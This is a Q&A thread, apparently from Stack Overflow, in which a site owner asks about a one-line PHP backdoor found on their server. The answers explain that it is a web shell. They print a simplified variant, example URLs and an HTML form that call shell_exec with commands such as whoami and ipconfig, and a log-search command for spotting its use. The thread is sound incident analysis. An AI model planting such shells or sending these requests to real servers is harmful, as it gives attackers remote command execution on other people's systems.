
I found a line of script left by the hacker in one of my PHP files. It reads like this:

<?php

// function name arrives in the query string (?2=...), its single argument in POST field 1
($_=@$_GET[2]).@$_($_POST[1]);

?>

Can anyone please give some hints about what this line of code does? Thank you

AstroCB
user2926814
  • errors are suppressed..? – Mr. Alien Oct 29 '13 at 15:48
  • 3
    This is used to call PHP functions with a simple URL. **Must** be removed as soon as possible. – zessx Oct 29 '13 at 15:51
  • 8
    It's a PHP shell. If you rewrite it to `=($_=@$_GET[2]).@$_($_GET[1])?>` the URL `file.php?1=shell_exec&2=whoami` executes the command `whoami` on the shell. In your example, one param is passed by POST, one by GET – Reeno Oct 29 '13 at 15:52
  • 1
    In general, it's not worth asking what hacked code does; it's usually obfuscated, and always does something nasty. First thing to do is remove it; restore your backups and make sure you've installed all available security patches for any third-party software you use. If you want to spend more time on it, spend that time working out how to avoid getting hacked again, rather than what the hack actually does. – Spudley Oct 29 '13 at 16:28
  • 4
    @Spudley actually it can be **incredibly helpful** to figure out what the code does. If you're being hacked by a script kiddie, you can pwn the pwnr. It's also incredibly useful to know what the code does so that you can mitigate the damage done by the attack. In this case we know that the attacker was executing shell commands... he could have escalated to uid=0. – Charles D Pantoga Oct 29 '13 at 16:54

3 Answers


I already posted it as a comment since the question was on hold, here now as an answer:

It's a PHP shell. If you rewrite it to <?php ($_=@$_GET[2]).@$_($_GET[1]); ?> the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.

You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.

Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.

/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.

Reeno

As Reeno already said in a comment, it's like a PHP shell.

Explanation

  • Store the GET variable with the key '2' in a variable called $_. Due to PHP's nature of weak typing, we do not need quotes around the number.

    $_=@$_GET[2]
    
  • Treat $_ as a callable function name and execute it with $_POST[1] as the first argument.

    @$_($_POST[1])
    

The @ operators should suppress error logging, see PHP.net: Error Control Operators.

The concatenation operator between the two statements does actually nothing important. It could be rewritten like this:

$_=@$_GET[2];
@$_($_POST[1]);

Use case

Calling arbitrary functions. I won't mention the specific HTTP headers for a successful attack, but this should be fairly easy for every (web) programmer.

ComFreek

First of all, you must remove those lines as soon as possible.

This code is used to call PHP functions. To give you an example, your hacker will use this kind of form:

<!-- query string carries the function name, POST field "1" carries its argument -->
<form method="post" action="http://site.com/page.php?2=shell_exec">
    <input name="1" value="ipconfig -all"/>
    <input type="submit" value="Send"/>
</form>

You'll then get these values:

  • $_ = $_GET[2] = shell_exec
  • $_POST[1] = ipconfig -all
  • $_($_POST[1]) = $_("ipconfig -all") = shell_exec("ipconfig -all")

The @ operators are there to suppress errors.


A simpler example would be to use this code:

<?= @$_GET['c'](@$_GET['p']); ?>

With a simple call to http://site.com/page.php?c=shell_exec&p=ipconfig%20-all.

zessx